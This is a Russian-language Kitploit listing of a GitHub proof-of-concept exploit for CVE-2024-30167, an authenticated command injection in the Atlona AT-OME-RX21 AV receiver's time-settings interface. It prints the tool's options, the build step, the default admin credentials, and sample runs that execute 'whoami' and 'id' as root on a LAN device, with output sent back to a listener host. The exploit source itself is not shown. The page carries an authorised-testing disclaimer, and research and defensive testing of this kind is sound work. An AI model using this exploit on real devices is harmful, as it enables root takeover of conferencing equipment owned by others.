Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-30167 — Эксплойт для проверки концепции аутентифицированной инъекции команд в Atlona AT-OME-RX21, позволяющий выполнение команд с правами root через интерфейс настройки времени. | Kitploit
Инструменты/GitHubGitHub/rizzziom/cve-2024-30167
Безопасность встроенных системАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

Эксплойт для проверки концепции аутентифицированной инъекции команд в Atlona AT-OME-RX21, позволяющий выполнение команд с правами root через интерфейс настройки времени.

Репозиторий
1129 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для аутентифицированного внедрения команд в Atlona OME

Отказ от ответственности: Данный proof of concept предоставлен исключительно для образовательных и исследовательских целей. Не используйте этот код в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Я не несу ответственности за любое неправомерное использование.

Уязвимость аутентифицированного внедрения команд существует в интерфейсе настройки времени AV-коммутатора Atlona AT-OME-RX21. Пользователь с действительными учетными данными может внедрить команды операционной системы, которые выполняются с правами root, что приводит к полной компрометации системы.

Информация о продукте

Atlona AT-OME-RX21 — это AV (аудио/видео) приемник и скалер, предназначенный для профессиональных сред видеоконференций и совместной работы. В основном используется в конференц-залах, учебных классах и переговорных комнатах. Он помогает подключать такие устройства, как ноутбуки/системы видеоконференций, к дисплеям.

Этот PoC работает со всеми версиями прошивки <= 1.5.1

информация о производителе: https://atlona.com/product/at-ome-rx21/

Использование

$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Usage of cve-2024-30167.exe:
  -P string
        listening port for command output (default "4444")
  -c string
        Command to execute on the target
  -l string
        listening host for command output
  -p string
        Password for authentication (default "Atlona")
  -t string
        Target URL (e.g: http://example.com)
  -u string
        Username for authentication (default "admin")
  1. Создайте бинарный файл для вашей системы
go build -o <OUTPUT_FILENAME>
  1. Запустите эксплойт против целевого устройства Atlona
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

указанная выше команда использует учетные данные по умолчанию для входа в устройство.

СИНТАКСИС:

.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

Скачать инструмент